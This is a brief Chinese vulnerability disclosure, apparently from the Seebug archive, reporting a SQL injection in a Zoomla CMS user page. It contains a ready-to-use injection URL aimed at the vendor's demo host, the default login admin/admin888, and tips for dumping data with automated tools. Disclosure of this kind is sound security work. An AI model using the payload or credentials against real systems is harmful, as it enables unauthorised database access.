### 简要描述:
只值1rank,给不给厂商随意,反正你的CMS那么不重视安全,无所谓了
### 详细说明:
前台随意注册一个用户。或者你就用那个admin/admin888来。
登录后访问
http://demo.zoomla.cn/User/UserZone/GatherStrainManage/HuaTeeRevert.aspx?ID=00000000-0000-0000-0000-000000000000'%20and%20@@version%3E0--&Gid=1&menu=delete&HuaTeePicID=00000000-0000-0000-0000-000000000000
[<img src="https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png" alt="20140209113306.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png)
### 漏洞证明:
如果想要用工具暴数据的话,ID=00000000-0000-0000-0000-000000000000或者HuaTeePicID=00000000-0000-0000-0000-000000000000一定要按这个格式,否则可能工具会暴不出数据
暂无评论